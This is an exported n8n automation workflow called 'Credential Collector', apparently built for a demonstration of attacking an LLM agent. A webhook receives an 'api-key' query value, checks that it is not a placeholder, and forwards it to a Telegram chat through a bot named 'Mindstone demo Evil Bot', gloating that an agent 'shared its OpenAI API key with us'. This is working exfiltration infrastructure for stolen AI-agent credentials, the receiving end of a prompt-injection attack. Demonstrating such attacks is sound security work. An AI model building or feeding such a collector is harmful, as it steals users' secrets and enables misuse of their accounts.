n8n-workflows/Credential Collector.json
{
  "name": "Credential Collector",
  "nodes": [
    {
      "parameters": {
        "chatId": "154905415",
        "text": "=Success\\\\! 😈 Sara's LLM Agent kindly shared its OpenAI API key with us: `{{ $json.query['api-key'] }}`",
        "additionalFields": {
          "appendAttribution": false,
          "parse_mode": "MarkdownV2"
        }
      },
      "type": "n8n-nodes-base.telegram",
      "typeVersion": 1.2,
      "position": [
        368,
        0
      ],
      "id": "1cf3a55b-9097-44bd-b9cf-5f357529c1a5",
      "name": "Send a text message",
      "webhookId": "e922205c-5125-46aa-9e7c-85cb4aaea842",
      "credentials": {
        "telegramApi": {
          "id": "FvuN3CVGYbwZckP7",
          "name": "Mindstone demo Evil Bot"
        }
      }
    },
    {
      "parameters": {
        "conditions": {
          "options": {
            "caseSensitive": true,
            "leftValue": "",
            "typeValidation": "strict",
            "version": 3
          },
          "conditions": [
            {
              "id": "1e09eb6a-8b6f-4212-bd48-596c282267e3",
              "leftValue": "={{ $json.query['api-key'] }}",
              "rightValue": "",
              "operator": {
                "type": "string",
                "operation": "exists",
                "singleValue": true
              }
            },
            {
              "id": "594998ce-a43a-46fc-8a88-3c9056589142",
              "leftValue": "={{ $json.query['api-key'] }}",
              "rightValue": "YOUR-OPENAI-KEY",
              "operator": {
                "type": "string",
                "operation": "notEquals"
              }
            }
          ],
          "combinator": "and"
        },
        "options": {}
      },
      "type": "n8n-nodes-base.if",
      "typeVersion": 2.3,
      "position": [
        32,
        0
      ],
      "id": "80a6f687-6d18-4b6a-abc2-160651bd9ef7",
      "name": "If"
    },
    {
      "parameters": {
        "path": "run",
        "options": {
          "responseData": "{\"status\": \"ok\"}"
        }
      },
      "type": "n8n-nodes-base.webhook",
      "typeVersion": 2.1,
      "position": [
        -256,
        0
      ],
      "id": "6b5c89a3-d9eb-48a6-8ee5-903e92f0e756",
      "name": "Webhook",
      "webhookId": "64332b48-e3ee-40cf-8973-65ae9cbb9fa9"
    }
  ],
  "pinData": {},
  "connections": {
    "If": {
      "main": [
        [
          {
            "node": "Send a text message",
            "type": "main",
            "index": 0
          }
        ]
      ]
    },
    "Webhook": {
      "main": [
        [
          {
            "node": "If",
            "type": "main",
            "index": 0
          }
        ]
      ]
    }
  },
  "active": true,
  "settings": {
    "executionOrder": "v1",
    "binaryMode": "separate",
    "availableInMCP": false
  },
  "versionId": "1498a7e5-007d-401d-baaf-958ac240476d",
  "meta": {
    "templateCredsSetupCompleted": true,
    "instanceId": "79134f92e9c5e82913df3dbccf401dd12eacf60e107be03e58f83cf645a7b64a"
  },
  "id": "yYLycZs3SaeVRan2",
  "tags": []
}